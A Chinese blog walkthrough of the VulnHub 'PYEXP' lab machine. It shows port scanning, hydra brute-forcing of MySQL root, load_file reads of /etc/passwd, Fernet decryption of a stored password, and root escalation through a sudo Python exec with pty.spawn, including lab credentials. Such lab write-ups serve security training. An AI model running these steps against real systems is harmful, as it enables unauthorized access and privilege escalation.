PYEXP靶机打靶记录

最新推荐文章于 2024-09-26 21:04:50 发布
最新推荐文章于 2024-09-26 21:04:50 发布
阅读量583 收藏 5
点赞数 21
分类专栏: vulnhub靶场 文章标签: 网络安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64703089/article/details/141284876
版权

靶机介绍

名称:PYEXP

Download (Mirror): https://download.vulnhub.com/pyexp/pyexpvm.zip

信息收集

靶机ip

端口扫描

全端口扫描

nmap -p- 192.168.196.130

发现只开放了1337和3306端口,针对端口进一步的进行信息收集

nmap -p1337,3306 -sC -sV 192.168.196.130

发现只开放了1337和3306端口,针对端口进一步的进行信息收集

漏洞探测

针对ssh服务进行测试

searchsploit ssh 7.9

针对mysql服务

searchsploit mysql 5.5.5

searchsploit -m 40360.py将把编号为40360的漏洞利用脚本复制到当前目录。

searchsploit -m 40360.py

运行脚本,发现无法进行

爆破ssh密码无果

mysql密码爆破

hydra -l root -P /usr/share/wordlists/rockyou.txt mysql://192.168.196.130

可以发现,已经获得到了MySQL数据库的密码

Getshell

[3306][mysql] host: 192.168.0.21   login: root   password: prettywoman

连接mysql

mysql -h192.168.196.130 -uroot -pprettywoman

试一下\!

\! id

发现是kali,可能靶机做了相关防护

试一下do_system函数

select  do_system("id");

发现也做了过滤

试一下任意文件读取

select load_file("/etc/passwd");

读取成功,发现了lucy账户

尝试对lucy账户爆破失败

读取密钥失败

直接进入数据库操作

发现这表里面是一些加密的内容

通过搜索,我们可以知道fernet为一个python的加解密

官网有使用方法Fernet (symmetric encryption) — Cryptography 2.8 documentation

通过python交互模式解出密文

from cryptography.fernet import Fernet
key = b'UJ5_V_b-TWKKyzlErA96f-9aEnQEfdjFbRKt8ULjdV0='
f = Fernet(key)
token = b"gAAAAABfMbX0bqWJTTdHKUYYG9U5Y6JGCpgEiLqmYIVlWB7t8gvsuayfhLOO_cHnJQF1_ibv14si1MbL7Dgt9Odk8mKHAXLhyHZplax0v02MMzh_z_eI7ys="
f.decrypt(token)

得到lucy的账户密码

lucy
wJ9`"Lemdv9[FEw-

ssh连接

 ssh lucy@192.168.196.130 -p 1337

获取到第一个flag

提权

sudo命令执行/usr/bin/python2 /opt/exp.py这个脚本,可以发现命令执行函数:exec

并且发现有root权限

使用shell的Python代码就可完成提权

sudo /usr/bin/python2 /opt/exp.py
import pty;pty.spawn("/bin/bash")

提权成功

找到最后一个flag打靶结束

总结

这个靶机没有web服务,所以说得从其他端口服务入手。

测试mysql时,mysql渗透中的一些敏感函数:\!, load_file(), do_system()要注意。

拿到shell,提权时观察到了敏感函数exec,利用Python函数,本地提权。

安全beginner
关注
专栏目录
Medium_socnent靶机打靶思路
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-02 1199
Medium_socnent靶机打靶思路涉及到的知识点 主机发现 端口扫描 服务发现 路径爬取 代码注入 Shell脚本 内网信息收集 内网穿透 漏洞利用与exp修改 密码破解 本地提权 攻击代码修改 发现主机 arp-scan -l确定192.168.229.147为靶机ip 扫描端口 查看端口详细信息 百度发现werkzeug是一个python的web框架,访问192.168.229.147:5000! 经过测试没有发现有价值信息,使用dirsearch扫描目录 访问admin目录,网页提示可以执行ex
dawn靶机打靶过程及思路
qq_52610024的博客
07-21 1275
5.执行mysql命令,sudo-uroot-p,输入之前命令历史内的hash破解之后的值,成功进入。6.利用find发现zsh具有root权限,输入zsh,zsh也具有root权限,成功得到root权限。3.针对3306端口的服务嗅探失败,针对80端口的目录发起扫描,发现日志里面存在一个。周期性的程序,创建一个相同名称的shell脚本,写入反弹shell的指令。4.成功突破边界进入系统,开始进行提权,首先查看命令历史,发现。符号中间没有信息,说明没有加盐,提示sudo-l命令。...
prime靶机打靶记录
jjjj1029056414的博客
12-04 1978
nmap&&目录爆破&&fuzz&&文件包含&&WordPress编辑主题反连shell&&linux内核漏洞提权
Breach 2.1靶机打靶记录
qq_64703089的博客
09-24 1110
Breach 2.1靶机打靶过程挺长的。
AdmX_new靶机打靶过程及思路
qq_52610024的博客
04-11 2492
pty.spawn(“/bin/bash”)’利用数据库密码登录wpadmin发现失败,开始登录数据库,mysql-uadmin-pWp-Admin#123。sudo发现一个文件有sudo权限,使用命令输入最开始的密码,登录进的数据库拥有root权限,思考使用数据库提权,查看wp-config.php下的数据库账号密码,尝试密码复用的可能性,想到最开始的登录界面的管理员账号密码,拿过来尝试su发现成功,获取到第一个flag文件。9.仍然尝试在404页面插入一句话木马,用蚁剑连接获得新的shell,...
Chronos靶机打靶过程与思路
qq_52610024的博客
04-06 3410
1.常规主机侦探,sudonetdiscover-r10.0.2.0/162.常规端口和服务侦探3.cyberchet解码器,针对js代码4.发现一个本地域名解析地址,修改etc下的hosts文件对应地址解析5.bp抓包后在cyberchef平台上解码发现为base58编码,是一串时间的函数执行,所以考虑使用命令执行6.编码后提交nc串联攻击获得反弹shell,开始代码审计,最后发现node.js下的express-fileupload模块。...
Nagini靶机打靶过程及思路
qq_52610024的博客
05-12 814
curl--proto‘=https’--tlsv1.2-sSfhttp//sh.rustup.rc|sh选择1后继续回车。showtables;将生成的payload输入得到表数据,发现users表,3.修改hosts文件,绑定域名,后ping通发现可以访问,但是返回的结果是相同的,使用cloudflare。ssh登录成功,得到第一个flag,得到第二个flag需要提权到horcrux账号。发现note.txt下存在提示信息,使用http3访问服务器,存在一个域名。...
medium-socnet靶机打靶过程及思路
qq_52610024的博客
04-02 3963
1.cp/usr/share/exploitdb/exploits/linux/remote/36337.py.------复制代码到根目录下。2.查看目标端口的服务信息proxychainsnmap-p22,5000-sT-sV-Pn172.17.0.1。2.使用脚本开始攻击------proxychainspython236337.py172.17.0.2。⑦ssh登录john----sshjohn@10.0.2.5准备进行提权操作。...
Fawkes靶机打靶过程及思路
qq_52610024的博客
05-08 1061
payload=‘A’*112+‘B’*4+‘\x90’*32+‘C’*32加x90是空指令,是为了程序的执行更加的顺滑。2.80端口没有得到任何有用的信息,21端口ftp可以匿名登录,登录进之后发现一个可以下载的文件。,下载后保存到本机并运行程序,在本机进程里发现运行成功,最后本机上开放了9898端口,运行后。执行脚本发现成功精确写入四个B,尝试在eip中写入跳转到esp的汇编指令,在esp中执行一个。8.手动修改代码,将sudo路径修改为/usr/bin/sudo,再次在靶机上执行程序,...
安装部署Web安全测试用的靶机
11-24
为了进行有效的测试,我们需要模拟真实的环境,这就是靶机的作用。本实验旨在通过安装部署Web安全测试靶机,包括DVWA、MCIR、Pikachu、mutillidae和BWAPP,来提供一个安全学习和实践的平台。 首先,安装XAMPP,这是...
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
打靶记录】DC-1打靶记录
Yun_jj的博客
07-26 142
通过DC-1靶机,了解渗透的过程,从多方面加深学习
打靶练习之--LazysysAdmin靶机
qq_34094920的博客
12-12 1065
渗透机IP:192.168.1.108目标靶机IP:192.168.1.106任务通过渗透机进入目标主机 获取flag。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8471
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Transact-SQL概述(SQL Server 2022)
brucexia的专栏
09-23 1265
Transact-SQL是Microsoft公司在关系数据库管理系统SQL Server中的SQL3标准的实现,是微软对SQL的扩展。在SQL Server中,所有与服务器实例的通信都是通过发送Transact-SQL语句到服务器来实现的。根据其完成的具体功能,可以将Transact-SQL语句分为四大类,分别为数据操作语句、数据定义语句、数据控制语句和一些附加的语言元素。
SQL 查询优化与实战
qq_63170044的博客
09-26 639
SQL 查询优化不仅仅是提高系统性能的重要手段,更是确保数据库在高并发环境下稳定运行的核心技能。通过合理使用索引、优化。
【达梦数据库】存储过程统计模式下表信息-SQL改写
最新发布
weixin_47686079的博客
09-26 227
在一次Oracle迁移Dm的过程中,源库&目的库大小写均敏感,执行客户提供的SQL脚本的过程中发现,表ip_address被系统默认成了表IP_ADDRESS。经过分析,客户提供的SQL没有使用双引号,来确保Oracle和Dm数据库按照指定的大小写来识别表名,因此,做以下改写。
使用 Bedrock 模型进行 SQL 查询生成:高效自动化的全新体验!
因果律的博客
09-20 1135
本文介绍了如何利用 Amazon Bedrock 模型和 Amazon SageMaker 服务生成 SQL 查询。首先,了解亚马逊的战略框架 Bedrock 模型和全托管的机器学习服务 SageMaker。然后,详细说明了验证 Bedrock 模型访问权限、创建 SageMaker Notebook 实例、启动 Jupyter Notebook,以及运行 Python 代码来配置输入参数和初始化 Antropic Claude V2 模型。最终,通过模型生成了所需的 SQL 查询语句,提高了开发效率。
网络安全攻防靶机建设方案
"网络安全攻防靶机的设计概要涵盖了项目背景、目标、技术和实施细节,旨在构建一个逼真的网络攻防训练环境,以提升信息安全人员的实战能力。该项目由国网xxx电力有限公司xxx供电公司发起,由安徽凌慧信息科技有限...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值